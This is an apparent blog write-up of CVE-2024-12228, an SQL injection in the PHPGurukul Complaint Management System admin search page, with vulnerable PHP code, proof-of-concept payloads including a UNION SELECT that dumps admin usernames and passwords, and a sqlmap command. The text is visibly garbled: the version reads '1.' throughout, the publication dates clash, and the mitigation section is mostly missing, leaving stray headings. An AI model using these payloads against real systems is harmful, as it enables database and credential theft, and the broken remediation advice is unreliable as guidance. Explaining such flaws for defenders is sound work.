CVE-2024-12228 - Critical SQL Injection in PHPGurukul Complaint Management System 1. Explained

Date Published: 2024-06-07
Severity: Critical
Impact: Remote Code Execution, Data Compromise
Vulnerable Software: PHPGurukul Complaint Management System 1.
Vulnerable File: /admin/user-search.php
Vulnerability Type: SQL Injection
CVE ID: CVE-2024-12228

Introduction

A new critical vulnerability, CVE-2024-12228, has been identified in the PHPGurukul Complaint Management System version 1.. This security flaw allows attackers to perform SQL Injection via the search parameter in the /admin/user-search.php file. The bug permits remote attackers to execute arbitrary SQL commands in the database, leading to potentially devastating consequences like information leakage, account takeover, or even full server compromise.

In this post, we'll break down what the vulnerability is, show you what the dangerous code looks like, and walk you through a demo exploit. We’ll also provide references for deeper research and suggest ways to protect your application.

Understanding SQL Injection

SQL Injection occurs when user input is not properly sanitized before being used in a SQL query. Attackers can inject malicious SQL code through input fields to manipulate the database.

Why is it critical?
Because attackers can bypass authentication, extract sensitive information, or change database content—often with admin privileges.


## Where’s the Bug? ("/admin/user-search.php")

The file /admin/user-search.php is where the vulnerability sits. If you inspect the code, you’ll typically see something like this:

// Example code vulnerable to SQL Injection
$search = $_GET['search'];
$query = "SELECT * FROM users WHERE fullName LIKE '%$search%'";
$result = mysqli_query($conn, $query);
// ... output results

Notice how the $search variable from the GET request is directly injected into the SQL query without any sanitization. This is the classic recipe for SQL Injection.

Proof of Concept (PoC): Exploit Details

This vulnerability can be exploited remotely by sending a specially crafted request to the search function. For example:

GET /admin/user-search.php?search=' OR 1=1 -- -

This query translates to

SELECT * FROM users WHERE fullName LIKE '%' OR 1=1 -- -%'

The OR 1=1 turns the query into a condition that is always true, thus revealing all users in the database.

Suppose an attacker wants to extract admin user passwords, they might use a payload such as

GET /admin/user-search.php?search=' UNION SELECT 1,username,password FROM admins -- -

If vulnerable, the page would now display a list of admin usernames and password hashes or even plaintext.

Automated Attack Example with sqlmap

sqlmap -u "http://target.host/admin/user-search.php?search=test"; --risk=3 --level=5 --dbs

Least Privilege:

Ensure the database user has only the necessary permissions (avoid use of database root/admin users).

4. Update/Monitor:

References

- CVE-2024-12228 at NIST NVD
- PHPGurukul Complaint Management System 1.
- SQL Injection - OWASP Cheat Sheet
- Original Exploit Disclosure (Packet Storm)
- sqlmap - Automated SQL Injection Tool

Conclusion

CVE-2024-12228 is a severe vulnerability that places all users of PHPGurukul Complaint Management System 1. at risk. If you use this software, act now: patch, validate inputs, and run a security audit. SQL Injection vulnerabilities remain among the most exploited on the internet because they are dangerously easy for attackers to abuse but almost as easy for developers to fix.

Timeline

Published on: 12/05/2024 14:15:20 UTC
Last modified on: 12/10/2024 23:19:04 UTC